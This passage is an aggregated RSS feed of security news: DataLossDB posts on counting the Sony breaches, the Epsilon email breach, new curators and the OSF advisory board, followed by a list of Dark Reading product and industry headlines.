incidents instead of one benefited Sony: they would not appear ranked 2nd in our list of all-time largest breaches on our home page. Since these incidents had the same parent corporation, he suggested, they should be treated as one aggregated incident. While those points may appear reasonable to some, we find them unpersuasive. First, we do not make decisions based on whether an entity benefits or suffers from a particular decision. We make decisions based on whether the available information supports aggregating the data for a particular incident or not. In this case, although it is the same parent corporation, the available information does not support aggregation. In other cases, such as a Wellpoint breach that was initially entered as distinct incidents, when my research revealed that there was only one incident and that what appeared to be a second incident was really due to Wellpoint's vendor not fully securing the web sites after the first report, I recommended that those incidents be combined, and they will be. But other than a common target - Sony - where is there any evidence that this was just one incident? There is none. We recognize that not everyone will agree with our decision, and that's fine. Should new information become available that suggests that a one-incident approach is more appropriate for these incidents, we will edit our entries. As always, we welcome constructive thoughts about how to make the database more useful to stakeholders, but we do not expect all of our decisions to please everyone.

==> Epsilon Bingo

http://datalossdb.org/incident_highlights.rss By now, everyone has probably read about a company named Epsilon. In fact, most people likely have second hand involvement, receiving one or more emails from companies you do business with warning you to be very careful after a recent incident. Most of these companies have used a similar form letter explaining the concerns and that you should be "cautious of phishing e-mails, where the sender tries to trick the recipient into disclosing confidential or personal information." These notifications stem from Epsilon, a managed e-mail broadcasting company, getting compromised and having all of their customer e-mail addresses copied. We have received a few emails from people asking us how we could have missed the Epsilon breach and why it isn't on our site. Well, it actually is on the site as we do follow incidents such as this, however, it is listed as a Fringe incident. Why Fringe? From what we can tell so far, the breach (while unacceptable) is contained to Names and Email Addresses. We do recognize that this information may increase the risk to customers as targeted spearphishing attempts may be more successful, however, there is no loss of PII. We have debated this topic for years and instead of not including them in DataLossDB, they are now just labeled Fringe. There will be more debate on the severity of this incident for sure. Some think it is critical and others merely say that their email address was never meant to be private anyways. There are good arguments supporting both sides of the debate. We will be continuing to add all of the affected organizations as we learn about them, and you can see the incident here: http://datalossdb.org/incidents/3540 When Epsilon posted the notice on their site they mentioned: "On March 30th, an incident was detected where a subset of Epsilon clients' customer data were exposed by an unauthorized entry into Epsilon's email system." As on April 4th, they have now have updated the definition of subset to mean "The affected clients are approximately 2 percent of total clients and are a subset of clients for which Epsilon provides email services." As of today, we are aware of a little over 40 companies affected and more notices are pouring in from users. As to how many users are impacted that is anyones guess. Our guess is A LOT. If you want to read some of the notices we have received, over a dozen are on our mailing lists archives: http://lists.osvdb.org/pipermail/dataloss/2011-April/thread.html For those that want to play along, we have decided to make some Epsilon Bingo Cards. If you are able to fill up a whole card and prove it with the notices we might have to give you a prize... that is the least we could do, right? As always, please keep sending us any notices that we are missing so that we may better gauge the scope of this incident and update the cards.

==> The DataLossDB project welcomes Dissent!

http://datalossdb.org/incident_highlights.rss The Open Security Foundation is pleased to announce that Dissent, the publisher and maintainer of DataBreaches.net and PHIprivacy.net has now joined DataLossDB as a curator for the project. OSF has worked with Dissent over the years and she is already known to us a DataLoss Archaeologist, as she took third place in our Oldest Incident contest. She found the 1984 TRW incident, where computer hackers gained access to a system holding credit histories of some 90 million people which happens to be the 3rd largest breaches of all time in DataLossDB. Her more active involvement with the project on a day-to-day basis will help us remain the most complete archive of dataloss incidents world-wide and will enhance our ability to keep current on more breaches in a timely manner. Dissent will continue to maintain her own web sites as a resource on breach news and issues. For those who do not know Dissent, she's a practicing health care professional with a special concern for health care sector breaches, and we expect to see increased coverage of medical sector breaches in the database in months to come. As Dissent notes, "With recent changes to federal laws making more information available to us about health care sector breaches, we are now beginning to get some sense of how common these breaches are and the common breach types. Including these incidents in the database will enable analyses that would not have been possible or meaningful just a few years ago." Open Security Foundations CEO, Jake Kouns says, Dissent has been a supporter of DataLossDB from the very beginning and is an extremely dedicated and thorough researcher. We are extremely fortunate to have her as part of the DataLossDB team and look forward to working more closely with her. Welcome Dissent, our newest curator and resident research queen!

==> Open Security Foundation Announces New Advisory Board

http://datalossdb.org/incident_highlights.rss As security vulnerabilities and data loss incidents become a regular occurrence, the Open Security Foundation has grown from supporting a single project in 2004 to a leading provider of filtering through security information and providing notifications and aggregation for data for data loss and cloud security incidents. The Open Security Foundation has evolved into one of the most utilized resources in providing security information, and as a 501c3 non-profit organization relies heavily on public contributions, volunteer effort and corporate sponsorships. The growing demand for information to provide proper risk management has led to additional projects and now the introduction of an advisory board consisting of industry professionals to lend their expertise in areas to keep OSF moving in a positive direction and to be the first line of access to all that require their service. Open Security Foundation CEO and founder Jake Kouns stated, This is a very important step in shaping the future of the Open Security Foundation. OSF has reached a point in growth that requires a strategic move to provide longevity and sustainability. It has always been a goal of this organization to provide our work to the broadest audience and the introduction of the advisory board will contribute to that objective. I am extremely proud to be part of such an amazing organization that has built a reputation of excellence and serves a very important function, adds Kouns. We put out a call for qualified individuals that could provide guidance and insight to keep OSF a leader in the security information arena. The results of our search far exceeded our highest expectations; its not only provides us with confidence in our direction, but the impact OSF has had on the industry. The new advisory board members comprises of an array of specific industries that understand the importance of OSF resources. Each member was chosen for a specific contribution to ultimately achieve the objective and mission of this foundation and capable of providing broad based perspective on information security, business management and fundraising. Tom Srail, Senior VP Willis Group provides 19 years of experience in the insurance industry with an expertise in risk consulting, professional liabilities, network security risks, intellectual property and technology professional risks. Shawn Andreas, VP Marketing Guard Dog Inc.(GRDO.PK) will contribute his 20 years of experience in marketing and brand awareness to remake OSF to be more consumer and market friendly focusing on fundraising and sponsorships opportunities. His expertise in marketing spans over diverse markets and includes opportunities working with some of the countrys top companies including GM, Apple, Viacom and more. Jim Hietala VP, Security for a leading IT standards organization, manages all security and risk management programs. Mr. Hietala is a frequent speaker at industry conferences. In addition he has published numerous articles on information security, risk management and compliance topics. Daniel E. Geer, Jr. Sc.D. Chief Information security officer In-Q-Tel Washington. Mr. Geer has a list of accomplishments including participation in government advisory roles for the Federal Trade Commission, the Departments of Justice and Treasury, the National Academy of Sciences, the National Science Foundation, the US Secret Service, the Department of Homeland Security, and the Commonwealth of Massachusetts. Andrew Lewman, Executive Director The Tor Project, Inc. Andrew Lewman is the Executive Director of The Tor Project, a non-profit organization. Mr. Lewman worked on projects with the National Science Foundation, Internews Network, Freedom House, Google, Broadcasting Board of Governors, National Network to End Domestic Violence, and the US State Department. In addition to the advisory board, OSF also announces new leadership positions with the organization. We are pleased to announce that Becky Chickering and Corey Quinn are now curators for the DataLossDB project. We want to thank everyone that contacted OSF to volunteer their time and skills for the advisory board and flexibility as we went through this process. During our conversations with potential members we spoke with several passionate individuals that have a great deal to offer OSF. We plan to continue to expand our leadership team and are always looking for volunteers to help the organization.

==> Open Security Foundation Launches New Cloud Security Project

http://datalossdb.org/incident_highlights.rss The Open Security Foundation, providing independent, accurate, detailed, current, and unbiased security information to professionals around the world, announced today that it has launched Cloutage (cloutage.org) that will bring enhanced visibility and transparency to Cloud security. The name Cloutage comes from a play on two words, Cloud and Outage, that combine to describe what the new website offers: a destination for organizations to learn about cloud security issues as well as a complete list of any problems around the globe among cloud service providers. The new website is aimed at empowering organizations by providing cloud security knowledge and resources so that they may properly assess information security risks related to the cloud. Cloutage documents known and reported incidents with cloud services while also providing a one-stop shop for cloud security news and resources. When speaking with individuals about the cloud, to this point it has been a very emotional conversation. People either love or hate the cloud, says Jake Kouns, Chairman, Open Security Foundation. Our goal with Cloutage is to bring grounded data and facts to the conversation so we can have more meaningful discussions about the risks and how to improve cloud security controls. Cloutage captures data about incidents affecting cloud services in several forms including vulnerabilities that affect the confidentiality and integrity of customer data, automatic update failures, data loss, hacks and outages that impact service availability. Data is acquired from verifiable media resources and is also open for community participation based on anonymous user submissions. Cloud solution providers are listed on the website and the community can provide comments and ratings based on their experiences. Cloutage also features an extensive news service, mailing lists and links to organizations focused on the secure advancement of cloud computing. The nebulous world of cloud computing and the security concerns associated with it confuses many people, even IT and security professionals," says Patrick McDonald, a volunteer on the Cloutage project. "We want a clearinghouse of information that provides a clear picture of the cloud security issues."

==> Wontok Introduces SafeCentral For Android At Gartner Security Summit

http://www.darkreading.com/rss/all.xml Company to introduce mobile security solution that protects personal and corporate data on Android devices

==> DigitalPersona Announces U.are.U Software Development Kit (SDK) For Android Applications

http://www.darkreading.com/rss/all.xml DigitalPersona U.are.U SDK for Android uses uniform APIs allowing for easy cross-platform development

==> PortSys Delivers OutSafe Outbound Isolation Capability To SafeRoom

http://www.darkreading.com/rss/all.xml OutSafe acts as "proxy protection" for outbound connections

==> Trend Micro Launches Web App Security Offering Including Advanced Detection And Protection

http://www.darkreading.com/rss/all.xml New security as a service solution offers automated scanning and security testing, automatic application protection, and unlimited SSL certificates

==> Bromium Rolls Out vSentry 2.0

http://www.darkreading.com/rss/all.xml Enhancements in vSentry 2.0 focus on three important requirements for enterprise deployments

==> Visa And Ethoca Collaborate To Help E-Commerce Merchants Reduce Fraud

http://www.darkreading.com/rss/all.xml Service is intended to help merchants reduce fraud losses and associated chargeback costs

==> Black Hat USA 2013 Showcases NAND, Windows 8 Secure Boot Hacking Talks

http://www.darkreading.com/rss/all.xml Organizers confirm another trio of Briefings from the show

==> Tech Insight: What You Need To Know To Be A Cyber Forensics Pro

http://www.darkreading.com/rss/all.xml A look at the skills, experience, and personality traits that make a successful forensics expert

==> Gartner: Worldwide Security Market To Grow 8.7 Percent In 2013

http://www.darkreading.com/rss/all.xml Three main trends shaping the security market moving forward

==> (ISC)2 Launches Certification Program For Cyber Forensics Experts

http://www.darkreading.com/rss/all.xml New Certified Cyber Forensics Professional (CCFP) will help train security pros to handle breaches, testify in court

==> 12 Endpoint Security Myths Dispelled

http://www.darkreading.com/rss/all.xml Mistaken beliefs that hold back endpoint protection

==> LockPath Launches Auditing Tool, Announces New Integrations For Security Manager App & Enhancements To GRC Platform

http://www.darkreading.com/rss/all.xml Audit Manager is an integrated solution designed to help streamline internal audits

==> BT Launches Integrated Solution For Large Scale “Bring Your Own Device” Deployment

http://www.darkreading.com/rss/all.xml BT’s integrated approach is designed to help CIOs deploy smart devices on a large scale

==> Why Database Assessment?

http://www.darkreading.com/rss/all.xml How FIS bungled the basics

==> Digital Defense Issued Patent-Pending Status For Technology

http://www.darkreading.com/rss/all.xml Patent is for scanning technology's host reconciliation process

==> Iris Biometrics Vendor EyeLock Joins FIDO Alliance

http://www.darkreading.com/rss/all.xml EyeLock will collaborate with Alliance members to identify and set a strategy on how to eliminate consumers’ reliance on passwords

==> Agiliance Unveils Mobile Risk Control At Gartner Summit

http://www.darkreading.com/rss/all.xml Service lets IT and security operations teams assess and score mobile application and device risks before they connect to the network

==> Lieberman Announces Automated Security As A Service At Gartner Conference

http://www.darkreading.com/rss/all.xml Upgrades Enterprise Random Password Manager

==> Palo Alto Networks Brings WildFire To The Private Cloud

http://www.darkreading.com/rss/all.xml Palo Alto Networks WF-500 appliance offers sandbox detection and analysis capabilities

==> Former White House Director Of Cybersecurity Joins Damballa Board

http://www.darkreading.com/rss/all.xml Sameer Bhalotra is the chief operating officer of Impermium

==> Veracode Introduces Mobile Application Reputation Service

http://www.darkreading.com/rss/all.xml Cloud-based service provides enterprises detailed and actionable intelligence on risky behavior and malicious code in mobile apps

==> Fortinet Advances Its Network Security Platform With New Enterprise Firewall Capabilitie